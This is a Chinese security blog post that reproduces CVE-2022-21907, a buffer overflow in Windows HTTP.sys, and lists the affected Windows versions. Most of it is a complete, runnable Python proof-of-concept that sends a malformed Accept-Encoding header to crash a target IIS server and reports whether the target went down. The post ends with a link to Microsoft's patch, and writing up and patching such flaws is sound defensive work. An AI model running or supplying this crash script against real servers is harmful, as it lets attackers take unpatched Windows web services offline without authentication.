HTTP协议栈远程代码执行漏洞(CVE-2022-21907)复现
HTTP协议栈远程代码执行漏洞(CVE-2022-21907)复现
洛米唯熊
发布于 2022-01-23 14:52:23
发布于 2022-01-23 14:52:23
0x00 漏洞概述
HTTP协议堆栈中存在远程代码执行漏洞,由于HTTP协议栈(HTTP.sys)中的HTTP Trailer Support功能存在边界错误可导致缓冲区溢出。
未经身份验证的攻击者通过向Web服务器发送特制的HTTP数据包,触发缓冲区溢出,从而在目标系统上执行任意代码。该漏洞被微软提示为“可蠕虫化”,无需用户交互,便可通过网络进行自我传播。
CVSS评分为9.8
0x01 影响范围
Windows Server 2019 (Server Core installation)
Windows Server 2019
Windows 10 Version 21H2 for ARM64-based Systems
Windows 10 Version 21H2 for 32-bit Systems
Windows 11 for ARM64-based Systems
Windows 11 for x64-based Systems
Windows Server, version 20H2 (Server Core Installation)
Windows 10 Version 20H2 for ARM64-based Systems
Windows 10 Version 20H2 for 32-bit Systems
Windows 10 Version 20H2 for x64-based Systems
Windows Server 2022 (Server Core installation)
Windows Server 2022
Windows 10 Version 21H1 for 32-bit Systems
Windows 10 Version 21H1 for ARM64-based Systems
Windows 10 Version 21H1 for x64-based Systems
Windows 10 Version 21H2 for x64-based Systems
Windows 10 Version 1809 for ARM64-based Systems
Windows 10 Version 1809 for x64-based Systems
Windows 10 Version 1809 for 32-bit Systems0x02 漏洞复现
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
# File name : CVE-2022-21907_http.sys_crash.py
# Author : Podalirius (@podalirius_)
# Date created : 13 Jan 2022
import argparse
import datetime
import requests
import time
import threading
def parseArgs():
parser = argparse.ArgumentParser(description="Description message")
parser.add_argument("-t", "--target", default=None, required=True, help='Target IIS Server.')
parser.add_argument("-v", "--verbose", default=False, action="store_true", help='Verbose mode. (default: False)')
return parser.parse_args()
def monitor_thread(target, dtime=5):
print('[>] Started monitoring of target server for the next %d seconds.' % dtime)
for k in range(dtime):
try:
r = requests.get(target, timeout=1)
except (requests.exceptions.ReadTimeout, requests.exceptions.ConnectTimeout) as e:
print(" [%s] \x1b[1;91mTarget is down!\x1b[0m" % datetime.datetime.now().strftime("%Y-%m-%d %H:%M:%S"))
else:
print(" [%s] \x1b[1;92mTarget is reachable!\x1b[0m" % datetime.datetime.now().strftime("%Y-%m-%d %H:%M:%S"))
time.sleep(1)
if __name__ == '__main__':
options = parseArgs()
if not options.target.startswith('http://') and not options.target.startswith('https://'):
target = "http://" + options.target
else:
target = options.target
payload = 'AAAAAAAAAAAAAAAAAAAAAAAA,AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA&AA&**AAAAAAAAAAAAAAAAAAAA**A,AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA,AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA,AAAAAAAAAAAAAAAAAAAAAAAAAAA,****************************AAAAAA, *, ,'
# Starting monitoring thread
t = threading.Thread(target=monitor_thread, args=(target,))
t.start()
time.sleep(2)
# Sending payload
print(" [+] Sending payload ...")
try:
r = requests.get(target, headers={"Accept-Encoding": payload}, timeout=15)
except (requests.exceptions.ReadTimeout, requests.exceptions.ConnectTimeout) as e:
t.join()
print("[%s] \x1b[1;91mTarget successfully crashed!\x1b[0m" % datetime.datetime.now().strftime("%Y-%m-%d %H:%M:%S"))
# Cleanup
t.join()0x03 修复方案
官方已发布受影响版本的对应补丁,建议受影响的用户及时更新官方的安全补丁。链接如下:
https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2022-21907
本文参与 腾讯云自媒体分享计划,分享自微信公众号。
原始发表:2022-01-22,如有侵权请联系 cloudcommunity@tencent.com 删除
评论
登录后参与评论
推荐阅读